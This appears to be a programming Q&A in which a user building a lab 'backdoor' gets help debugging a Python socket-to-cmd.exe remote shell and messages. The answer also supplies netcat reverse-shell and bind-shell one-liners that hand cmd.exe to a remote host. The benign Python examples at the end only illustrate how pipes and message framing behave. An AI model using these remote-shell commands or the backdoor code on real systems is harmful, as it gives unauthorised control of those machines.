Python subprocess stdin.write a string: error 22 invalid argument


I have 2 Python files communicating over a socket. When I pass the data I took to stdin.write, I get error 22, invalid argument. The code:

    import subprocess

    a = "C:\Python27\Tools"
    proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True, shell=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            stdin=subprocess.PIPE)
    data = s.recv(1024)  # s is the socket I created
    proc.stdin.write(data)  ##### error in this line
    output = proc.stdout.readline()
    print output.rstrip()
    remainder = proc.communicate()[0]
    print remainder

Update: OK, I want to create a backdoor on a system, in a localhost inside a network lab. It is for educational purposes. I have 2 machines. 1) is running Ubuntu, and I have this in the server code:

    import socket, sys

    s = socket.socket()
    host = "192.168.2.7"  # the server's IP
    port = 1234
    s.bind((host, port))
    s.listen(1)  # wait for a client connection

    c, addr = s.accept()  # establish a connection with the client
    print 'got connection from', addr
    c.send('Thank you for connecting')

    while True:
        command_from_user = raw_input("give command: ")  # read a command from the user
        if command_from_user == 'quit':
            break
        c.send(command_from_user)  # send the command to the client
    c.close()  # close the connection

I have this code for the client:

    import socket
    import sys
    import subprocess, os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'socket created'

    host = "192.168.2.7"  # IP of the server machine
    port = 1234
    s.connect((host, port))  # open a TCP connection to hostname on the port
    print s.recv(1024)

    a = "C:\Python27\Tools"
    proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            stdin=subprocess.PIPE)

    while True:
        data = s.recv(1024)
        if (data == "") or (data == "quit"):
            break
        proc.stdin.write('%s\n' % data)
        proc.stdin.flush()
        remainder = proc.communicate()[0]
        print remainder

        stdoutput = proc.stdout.read() + proc.stderr.read()

    s.close()  # closing the socket

And the error is in the client file:

    Traceback (most recent call last):
      File "ex1client2.py", line 50, in <module>
        proc.stdin.write('%s\n' % data)
    ValueError: I/O operation on closed file

Basically, I want to run serial commands from the server on the client, and get the output back in the server. The first command is executed, but with the second command I get this error message. The main problem that led me to this solution was the changing directory command. When I execute cd "path", it doesn't change.

Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:

    while True:
        data = s.recv(1024)
        if (data == "") or (data == "quit"):
            break
        proc.stdin.write('%s\n' % data)
        proc.stdin.flush()
        remainder = proc.communicate()[0]
        print remainder
        stdoutput = proc.stdout.read() + proc.stderr.read()

The problem is that each time through the loop, you're calling proc.communicate(). As the docs explain, this will:

> Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.

So, after this call, the child process has quit, and the pipes are closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means what it says.

If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.

On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.

The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in different shells, you're going to end up getting the directory listing of C:\Python27\Tools rather than C:\Users\me\Documents.

But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't toss them into select, because pipes aren't sockets. So, the real option is to create a reader thread for stdout and one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.

If you look at the source to communicate, you can see how the threading should work.


Meanwhile, as a side note, your code has a serious problem. You're expecting that each s.recv(1024) is going to return one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.

On localhost, or a home LAN, when you're sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will mysteriously break sometimes. And on the internet, and many real LANs, it will work 10% of the time.

So, you have to implement some kind of protocol that delimits messages in some way.

Fortunately, for simple cases, Python gives you an easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:

    while True:
        data = s.recv(1024)

… do this:

    f = s.makefile()
    while True:
        data = f.readline()

You do need to remember to close both f and s later (or s right after makefile, and f later). A more idiomatic use is:

    with s.makefile() as f:
        s.close()
        for data in f:
            pass  # handle one newline-delimited command here

One last thing:

> OK, I want to create a backdoor on a system, in a localhost inside a network lab

"localhost" means the same machine you're running on, so "a localhost inside a network lab" doesn't make sense. I assume you meant "host" here, in which case the whole thing makes sense.


If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's installable with apt-get netcat or apt-get nc. Windows doesn't come with anything, but you can get ports of the variants.

A quick Google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and videos showing how to do this, such as Using Netcat to Spawn a Remote Shell, but you're better off googling for netcat tutorials instead.

The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your "backyard server" listens forever—you can connect up, do some stuff, quit, connect again later, etc. without having to go to the Windows box and start a new connection.

But the other way around, with a backyard client on the Windows box, is easy. On the Ubuntu box, start a server that connects the terminal to the first connection that comes in:

    nc -l -p 1234

Then on the Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:

    nc -e cmd.exe 192.168.2.7 1234

That's it. A lot simpler than writing it in Python.

For the more typical design, the backdoor server on Windows runs this:

    nc -k -l -p 1234 -e cmd.exe

And then you connect from Ubuntu with:

    nc windows.machine.address 1234

Or you can add -t to the backdoor server, and connect with telnet instead of nc.
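
The communicate() behaviour described in the answer can be reproduced without cmd.exe. This is an added example, not code from the question or the answer, written for Python 3; the child is a constructed stand-in that understands only "cd <dir>" and "pwd", and spawn, one_child_with_communicate and fresh_child_per_command are names made up for the illustration.

```python
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for cmd.exe: understands only "cd <dir>" and "pwd",
# reading one command per line from stdin until end-of-file.
CHILD = r"""
import os, sys
for line in sys.stdin:
    cmd = line.strip()
    if cmd.startswith("cd "):
        os.chdir(cmd[3:])
    elif cmd == "pwd":
        print(os.getcwd())
"""

def spawn():
    return subprocess.Popen([sys.executable, "-c", CHILD],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=True)

def one_child_with_communicate(commands):
    """The question's loop: write, then communicate(), on a single child."""
    proc, log = spawn(), []
    for cmd in commands:
        try:
            proc.stdin.write(cmd + "\n")
            proc.stdin.flush()
            # communicate() closes stdin, reads to EOF and waits for exit.
            log.append(proc.communicate()[0].strip())
        except ValueError as exc:  # second pass: stdin is already closed
            log.append("ValueError: %s" % exc)
    return log, proc.returncode

def fresh_child_per_command(commands):
    """Popen moved inside the loop: every command gets a new process."""
    log = []
    for cmd in commands:
        out, _ = spawn().communicate(cmd + "\n")
        log.append(out.strip())
    return log

if __name__ == "__main__":
    cmds = ["cd " + tempfile.mkdtemp(), "pwd"]
    print(one_child_with_communicate(cmds))  # second entry is the ValueError
    print(fresh_child_per_command(cmds))     # pwd shows the old directory
```
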
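
The message-framing point from the answer, as an added example that is not part of the original post, written for Python 3: the same byte stream, cut at arbitrary points the way recv(1024) may cut it, is reassembled into newline-delimited messages by a small buffer and by makefile(). LineFramer, its max_line cap and the sample chunks are constructed for this illustration.

```python
import socket

class LineFramer:
    """Rebuild newline-delimited messages from arbitrary recv() chunks."""

    def __init__(self, max_line=4096):
        self.buf = b""
        self.max_line = max_line  # bound the buffer if no newline ever arrives

    def feed(self, chunk):
        """Take one recv() result; return the complete messages it finished."""
        self.buf += chunk
        *lines, self.buf = self.buf.split(b"\n")
        if len(self.buf) > self.max_line:
            raise ValueError("no newline within %d bytes" % self.max_line)
        return [line.decode("utf-8") for line in lines]

# Constructed sample: three messages as written by the sender ...
MESSAGES = ["first message", "second", "third one"]
# ... and the same byte stream cut where recv(1024) might happen to cut it.
CHUNKS = [b"first message\nsecond\nthi", b"rd ", b"one\n"]

def naive(chunks):
    """Treat every recv() result as exactly one message."""
    return [c.decode("utf-8") for c in chunks]

def framed(chunks):
    framer, out = LineFramer(), []
    for c in chunks:
        out.extend(framer.feed(c))
    return out

def via_makefile(chunks):
    """The answer's s.makefile() approach, over a local socket pair."""
    a, b = socket.socketpair()
    for c in chunks:
        a.sendall(c)
    a.close()  # end-of-file terminates the iteration below
    with b.makefile("r", encoding="utf-8") as f:
        b.close()
        return [line.rstrip("\n") for line in f]

if __name__ == "__main__":
    print("naive   :", naive(CHUNKS))
    print("framed  :", framed(CHUNKS))
    print("makefile:", via_makefile(CHUNKS))
```

Iterating over the makefile() object reads lines of any length; passing a size to readline is the way to bound it in the same manner as max_line.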

